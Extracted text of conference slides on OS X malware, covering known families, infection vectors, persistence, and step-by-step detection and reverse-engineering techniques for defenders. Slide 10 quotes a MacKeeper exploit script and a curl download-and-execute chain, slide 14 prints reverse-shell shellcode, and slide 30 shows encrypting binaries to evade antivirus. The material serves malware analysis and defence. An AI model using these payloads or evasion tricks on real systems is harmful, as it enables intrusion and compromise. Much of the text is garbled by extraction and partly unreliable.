    MALWARE ON OSX yes; it exists and is geSng more prevalent “It doesn’t get PC viruses. A Mac isn’t suscep1ble to the thousands of viruses plaguing Windows-based computers.” -apple.com (2012) 2014: "nearly 1000 unique aMacks on Macs; 25 major families" -kasperksy 2015: "The most prolific year in history for OS X malware...5x more OS X malware appeared in 2015 than during the previous five years combined" 
 -bit9 2015: OS X most vulnerable soEware by CVE count -cve details
  • 6.
    OS X/IWORM ‘standard’ backdoor,providing survey, download/execute, etc. # fs_usage -w -f filesys 20:28:28.727871 open /Library/LaunchDaemons/com.JavaW.plist 20:28:28.727890 write B=0x16b launch daemon survey download execute persis:ng infected torrents launch daemon plist
  • 7.
    OS X/CRISIS (RCSMAC) hackingteam'simplant; collect all things! launch agent rootkit component persistence (leaked source code) intelligence collec:on “HackingTeam Reborn; 
 Analysis of an RCS Implant Installer"
  • 8.
    OS X/XCODEGHOST applica/on infector $less Xcode.app/Contents/PlugIns/Xcode3Core.ideplugin/Contents/SharedSupport/Developer/Library/Xcode/ Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/Ld.xcspec
 ... Name = ALL_OTHER_LDFLAGS; DefaultValue = "$(LD_FLAGS) $(SECTORDER_FLAGS) $(OTHER_LDFLAGS) $(OTHER_LDFLAGS_$(variant)) $ (OTHER_LDFLAGS_$(arch)) $(OTHER_LDFLAGS_$(variant)_$(arch)) $(PRODUCT_SPECIFIC_LDFLAGS) 
 -force_load $(PLATFORM_DEVELOPER_SDK_DIR)/Library/Frameworks/CoreServices.framework/CoreServices"; modified LD.xcspec file source compile app store infected :( infected app app installed
  • 9.
    } OS X/GENIEO (INKEEPR) mostprolific os x adware browser extension(s) fake installers bundled with apps ADs
  • 10.
    OS X/BACKDOOR(?) bot/backdoor thatexploits MacKeeper <script> window.location.href = 'com-zeobit-command:///i/ZBAppController/performActionWithHelperTask: arguments:/<BASE_64_ENCODED_STUB>'; ... "[a] flaw in MacKeeper's URL handler implementa1on allows arbitrary remote code execu1on when a user visits a specially cra]ed webpage" -bae systems exploit & payload launch agent curl -A 'Safari' -o /Users/Shared/dufh http://<redacted>/123/test/qapucin/bieber/210410/cormac.mcr; chmod 755 /Users/Shared/dufh; cd /Users/Shared; ./dufh shell download executesurvey
  • 11.
    OS X/CARETO ('MASK') ‘cyber-espionagebackdoor' launch agent [~/Library/LaunchAgents/ com.apple.launchport.plist] lea rdi, encodedServer ; "x16dn~x1AcM!"... mov rsi, decodedServer call __Dcd ... mov rdi, decodedServer mov esi, cs:_port call _sbd_connect $ lldb OSX_Careto (lldb) target create "OSX_Careto" Current executable set to 'OSX_Careto' (x86_64).'' 
 (lldb) b _Dcd Breakpoint 1: where = OSX_Careto`_Dcd,
 ... $ (lldb) x/s decodedServer 0x100102b40: "itunes212.appleupdt.com" disassembly debugging (decoding C&C) encoded strings phishing/exploits
  • 12.
    PART 0X2: VIROLOGY studyof os x malware characteris/cs & commonali/es
  • 13.
    INFECTION VECTORS method 0x1:via user-interac/on fake codecs fake installers/updates infected torrents rogue "AV" products ??? poor naive users
  • 14.
    INFECTION VECTORS method 0x2:exploits "interested in buying zero-day vulnerabili1es with RCE exploits for the latest versions of ...Safari? ...exploits allow to embed and remote execute custom payloads and demonstrate modern [exploita1on] techniques on OS X" 
 -V. Toropov (email to hackingteam) how the real hackers do it } ;OSX x64 reverse tcp shell (131 bytes, shell-storm.org) ;"x41xB0x02x49xC1xE0x18x49x83xC8x61x4Cx89xC0x48" + ;"x31xD2x48x89xD6x48xFFxC6x48x89xF7x48xFFxC7x0F" + ;"x05x49x89xC4x49xBDx01x01x11x5CxFFxFFxFFxFFx41" + ;"xB1xFFx4Dx29xCDx41x55x49x89xE5x49xFFxC0x4Cx89" + ;"xC0x4Cx89xE7x4Cx89xEEx48x83xC2x10x0Fx05x49x83" + ;"xE8x08x48x31xF6x4Cx89xC0x4Cx89xE7x0Fx05x48x83" + ;"xFEx02x48xFFxC6x76xEFx49x83xE8x1Fx4Cx89xC0x48" + ;"x31xD2x49xBDxFFx2Fx62x69x6Ex2Fx73x68x49xC1xED" + ;"x08x41x55x48x89xE7x48x31xF6x0Fx05"
  • 15.
    PERSISTENCE many op/ons, fewused launchdaemons&agents userloginitems browserextensions&plugins [RSA2015]
 "Malware Persistence on OS X" ~20 techniques
  • 16.
    FEATURES dependent on thegoals of the malware [ criminal ] [ espionage ] shell video audio ads clicks money keylogs surveys downloads exec's
  • 17.
    SUMMARY the current stateof OS X malware crime espionage persistence psp bypassself-defense features ‣ well known methods ‣ majority: launch items ‣ minimal obfusca:on ‣ trivial to detect/remove ‣ poorly implemented ‣ suffice for the job ‣ occasional an:-AV ‣ no psp detec:on stealth ‣ 'hide' in plain site ‣ rootkits? not common infec:on ‣ trojans/phishing ‣ some exploits
  • 18.
    PART 0X3: DIAGNOSTICS areyou possibly infected?
  • 19.
    VISUALLY OBSERVABLE INDICATORS moreohen than not, you're not infected... unlikelymalware possiblymalware "mycomputeris soslow" "itkeepscrashing" ADs "somanyprocesses" "therearetonsofpopups" "mycomputersaysitsinfected "myhomepageandsearch engineareweird" most not trivially observable!
  • 20.
    VISUALLY OBSERVABLE INDICATORS genericalerts may indicate the presence of malware persistence(BlockBlock) networkaccess(LittleSnitch) note:suchtoolsdonotattempttodirectlydetectmalwareper-se…
  • 21.
    STEP 0X1: KNOWNMALWARE any known malware running on your system? TaskExplorer(+virustotalintegration) VT ratios
  • 22.
    STEP 0X2: SUSPICIOUSPROCESSES any unrecognized binaries running on your system? unsignedtasks “globalsearch”for: 3rd-partytasks unsigned "apple" unrecognized(byVT) suspicious! + +
  • 23.
    STEP 0X3: SUSPICIOUSPERSISTENCE any unrecognized binaries persis/ng on your system? KnockKnock;enum.persistence unsigned "apple" suspicious! asuspiciouslaunchitem unrecognized(byVT) + +
  • 24.
    STEP 0X4: NETWORKI/O odd ports or unrecognized connec/ons? # sudo lsof -i | grep ESTABLISHED apsd 75 root TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED) apsd 75 root TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED) com.apple 1168 user TCP 172.16.44.128:49511->bd044252.virtua.com.br:https (ESTABLISHED) JavaW 1184 root TCP 172.16.44.128:49532->188.167.254.92:51667 (ESTABLISHED) iWorm('JavaW')listeningforattackerconnection or 'established' for connected sessions iWormconnectedtoc&cserver
  • 25.
    STEP 0X5: SUSPICIOUSKEXTS, HIJACKED DYLIBS, ETC. countless other things to look for.... uncheck ‘'Show OS Kexts' anysuspiciouskernelextensions? hijackeddylibs? [DefCon 2015] "DLL Hijacking on OS X? #@%& Yeah!"
  • 26.
    PART 0X4: ANALYSIS determineif something is malicious....or not!?
  • 27.
    CODE-SIGNING examine the binary’scode signature $ codesign -dvv /usr/lib/libtidy.A.dylib 
 Format=Mach-O universal (i386 x86_64)
 Authority=Software Signing Authority=Apple Code Signing Certification Authority Authority=Apple Root CA libtidy is signed by apple proper codesign -dvv OSX_Careto 
 OSX_Careto: code object is not signed at all most malware; unsigned signed by apple: not malware! libtidy dylib flagged by VT usecodesigntodisplaya binary’ssigninginfo ex:$ codesign -dvv <file>
  • 28.
    GOOGLE THE HASH may(quickly) tell you; known good || known bad $ md5 appleUpdater MD5 (appleUpdater) = 2b30e1f13a648cc40c1abb1148cf5088 unknown hash ….might be odd ‣ 3rd-partybinaries,mayproduce zerohitsongoogle ‣ 0%detectiononvirustotaldoesn’t mean100%notmalware known hash (OSX/Careto)
  • 29.
    STRINGS quickly triage abinary’s func/onality $ strings -a OSX_Careto
 reverse lookup of %s failed: %s bind(): %s connecting to %s (%s) [%s] on port %u executing: %s
 cM!M> `W9_c [0;32m strings;osx/careto networking& execlogic encodedstrings $ strings -a JavaW 
 $Info: This file is packed with the UPX executable packer $Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. strings; iWorm usewiththe-aflag packed(UPX) googleinterestingstrings
  • 30.
    FILE ATTRIBUTES OS Xna/vely support encrypted binaries ourhardworkbythese wordsguardedplease dontsteal(c)AppleC encrypted with Blowfish disassembling Finder.app encryp:ng the malware $ strings -a myMalware infectUser: ALOHA RSA! $ ./protect myMalware encrypted 'myMalware' $ strings -a myMalware 
 n^jd[P5{Q r_`EYFaJq07 known malware: ~50% drop VT detection
  • 31.
    FILE ATTRIBUTES detec/ng encryptedbinaries //check all load commands for(int i = 0; i<[machoHeader[LOAD_CMDS] count]; i++) { //grab load command loadCommand = [machoHeader[LOAD_CMDS] pointerAtIndex:i];
 //check text segment if(0 == strncmp(loadCommand->segname, SEG_TEXT, sizeof(loadCommand->segname)) { //check if segment is protected if(SG_PROTECTED_VERSION_1 == (loadCommand->flags & SG_PROTECTED_VERSION_1)) { //FILE IS ENCRYPTED detec:ng encryp:on TaskExplorer }unsigned encrypted +
  • 32.
    FILE ATTRIBUTES malware isohen packed to 'hinder' detec/on/analysis $ strings -a JavaW
 
 Info: This file is packed with the UPX executable packer http://upx.sf.net Id: UPX 3.09 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. iWorm(JavaW);packed //count all occurrences for(NSUInteger i = 0; i < length; i++) occurrences[0xFF & (int)data[i]]++; //calc entropy for(NSUInteger i = 0; 
 i < sizeof(occurrences)/sizeof(occurrences[0]); i++) { //add occurrences to entropy if(0 != occurrences[i]) { //calc ratio pX = occurrences[i]/(float)length; //cumulative entropy entropy -= pX*log2(pX); } TaskExplorer genericpackerdetectionalgorithm viewallpackedtasks/dylibs
  • 33.
    CLASSDUMP extract class names,methods, & more... $ class-dump RCSMac.app
 
 @interface __m_MCore : NSObject { NSString *mBinaryName; NSString *mSpoofedName; } - (BOOL)getRootThroughSLI;
 - (BOOL)isCrisisHookApp:(id)arg1;
 - (BOOL)makeBackdoorResident; - (void)renameBackdoorAndRelaunch;
 @end rcsmac(osx/crisis) $ class-dump Installer.app
 
 @interface ICDownloader : 
 NSObject <NSURLConnectionDelegate> { NSURL *_URL; NSString *_destPath; long long _httpStatusCode; NSString *_suggestedName; } - (void)startDownloading; @interface NSURL (ICEncryptedFileURLProtocol) + (id)fileURLWithURL:(id)arg1; + (id)encryptedFileURLWithURL:(id)arg1; @end adwareinstaller(InstallCore) http://stevenygard.com/projects/class-dump/
  • 34.
    DYNAMIC FILE I/O quicklydetermine binaries file-related ac/ons # fs_usage -w -f filesystem
 open /Users/user/Library/LaunchAgents/com.apple.updater.plist write F=2 B=0x4a 
 
 
 open F=5 /Users/Shared/dufh …
 chmod <rwxr-xr-x> /Users/Shared/dufh 
 unlink ./mackeeperExploiter filei/o(mackeeperexploiter) $ man fs_usage FS_USAGE(1) BSD General Commands Manual fs_usage -- report system calls and page faults related to filesystem activity in real-time fs_usagemanpage persistenceaslaunchagent (com.apple.updater.plist) installation(/Users/ Shared/dufh) selfdeletion,cleanup
  • 35.
    NETWORK I/O gain insightinto the binary's network communica/ons osx/caretoinwireshark note: C&C is (now) offline odddnsqueries periodicbeacons (custom)encryptedtraffic "itunes212.appleupdt.com"
  • 36.
    VIRUSTOTAL SANDBOX file i/o+ network i/o, and more! virustotalportal filei/o(iWorm) networki/o(iWorm) "VirusTotal+=MacOSXexecution"
 
 blog.virustotal.com/2015/11/ virustotal-mac-os-x-execution.html
  • 37.
    REVERSING OBJECTIVE-C understand connectedToInternet(void) procnear mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString ; "URLWithString:" lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ; objc_msgSend ... internetcheck(mackeeperexploiter) arg name (for) objc_msgSend 0 RDI class 1 RSI method name 2 RDX 1st argument 3 RCX 2nd argument 4 R8 3rd argument 5 R9 4th argument objc_msgSendfunction callingconvention(systemvamd64abi)
  • 38.
    DECOMPILATION there’s an appfor that! int connectedToInternet() { rax = [NSURL URLWithString:@"http://www.google.com"]; rdx = rax; var_38 = [NSData dataWithContentsOfURL:rdx]; if(var_38 != 0x0) { var_1 = 0x1; } else { var_1 = 0x0; } rax = var_1 & 0x1 & 0xff; return rax; } decompilation;internetcheck(mackeeperexploiter) connectedToInternet(void) proc near mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString_ lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ... hopper.app
 http://www.hopperapp.com
  • 39.
    DEBUGGING using lldb; osx’s debugger command description example r launch (run) the process b breakpoint on function b system br s -a <addr> breakpoint on a memory add br s -a 0x10001337 si/ni step into/step over po print objective-C object po $rax reg read print all registers $ lldb newMalware (lldb) target create "/Users/patrick/malware/newMalware" Current executable set to '/Users/patrick/malware/newMalware' (x86_64). beginningadebuggingsession see:"Gdb to LLDB Command Map" commonlldbcommands
  • 40.
    DEBUGGING DETECTION os xan/-debugging techniques call _getpid mov [rbp+var_34], eax mov [rbp+var_2D0], 288h lea rdi, [rbp+var_40] lea rdx, [rbp+var_2C8] lea rcx, [rbp+var_2D0] mov esi, 4 xor r8d, r8d xor r9d, r9d call _sysctl mov eax, [rbp+var_2A8] test ah, 8 jz short notDebugged mov rdi, [rbx] call _remove //debugger flag #define P_TRACED 0x00000800 //management info base (‘mib’) mib[0] = CTL_KERN; mib[1] = KERN_PROC; mib[2] = KERN_PROC_PID; mib[3] = getpid(); //get process info sysctl(mib, sizeof(mib)/sizeof(*mib), &info, &size, NULL, 0); //check flags to determine if debugged if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)) { //process is debugged!
 //self delete remove(path2Self); } anti-debug(mackeeperexploiter) processflags(debugged) anti-debugpseudo-code “Analyzing the Anti-Analysis Logic, of an Adware Installer"
  • 41.
    ENABLING KERNEL DEBUGGING foranalyzing kernel extensions and rootkit components # nvram boot-args="debug=0x141 pmuflags=1 -v" enabledebugging disableSIP(inrecoverymode;⌘+r) installappropriate‘kerneldebugkit’ # lldb (lldb) target create /Library/Developer/KDKs/ KDK_10.11.1_15B42_.kdk/System/Library/Kernels/kernel startdebugger(lldb) (lldb) kdp-remote <VM IP addr> Version: Darwin Kernel Version 15.0.0: Wed Aug 26 16:57:32 PDT 2015; root:xnu-3247.1.106~1/ RELEASE_X86_64; 
 
 (lldb) image list [ 0] 37BC582F-8BF4-3F65-AFBB-ECF792060C68 0xffffff8007000000 /Library/Developer/KDKs/ KDK_10.11_15A284.kdk/System/Library/Kernels/kernel connectanddebug “Kernel Debugging a Virtualized 
 OS X Image"
  • 42.
    PART 0X5: HEALTH& HAPPINESS how do i protect my personal macs?
  • 43.
    APPLE'S OS XSECURITY MITIGATIONS? gatekeeper, xprotect, SIP, code-signing, et al... "Security & privacy are fundamental to the design of all our hardware, so]ware, and services" -:m cook ‣ "Gatekeeper Exposed"
 (Shmoocon) ‣ "OS X El Capitan-Sinking the S/hIP" ‣ "Memory Corruption is for Wussies!" (SysScan) ‣ "Writing Bad@ss OS X Malware" 
 (Blackhat) ‣ "Attacking the XNU Kernel in El Capitan" (BlackHat)
  • 44.
    only 4 launchitems no 'java' processes fully patched OS X gatekeeper enabled DEMO(GATEKEEPER BYPASS)
  • 45.
    OS X LOCKDOWN hardensOS X & reduces its anack surface # ./osxlockdown [PASSED] Enable Auto Update [PASSED] Disable Bluetooth [PASSED] Disable infrared receiver [PASSED] Disable AirDrop ...
 
 osxlockdown 0.9 Final Score 86%; Pass rate: 26/30
 osxlockdown
 S.Piper(@0xdabbad00) github.com/SummitRoute/osxlockdown “builttoaudit&remediate,security configurationsettingsonOSX10.11" -S.Piper
  • 46.
    OS X SECURITYTOOL LinleSnitch Firewall “if[LittleSnitch]isfound,themalware[OSX/DevilRobber.A]willskip installationandproceedtoexecutethecleansoftware”-fSecure.com trivialtobypass securityvulnerabilities? yes, stay tuned! 'snitching
  • 47.
    MY PERSONAL SECURITYTOOLS Objec/ve-See, because "sharing is caring" :) "No one is going to provide you a quality service for nothing. 
 If you’re not paying, you’re the product." -fSecure ...as they try to sell things! + I should write some OS X security tools to protect my Mac ....and share 'em freely :)
  • 48.
  • 49.
  • 50.
    CONCLUSIONS & APPLICATION osxmalware (iWorm,Crisis,Genieo,etc.) learnedabout: scan & protect! littlesnitch/firewall patrick@synack.com @patrickwardle genericdetection&analysis 'focusonsession'
 today@2:10PM,westroom2016
  • 51.
    credits - iconmonstr.com - http://wirdou.com/2012/02/04/is-that-bad-doctor/
 
 
 -thesafemac.com - "Mac OS X & iOS Internals", Jonathan Levin - http://researchcenter.paloaltonetworks.com/2015/09/more-details-on-the-xcodeghost-malware- and-affected-ios-apps/ - http://baesystemsai.blogspot.ch/2015/06/new-mac-os-malware-exploits-mackeeper.html - http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
 images resources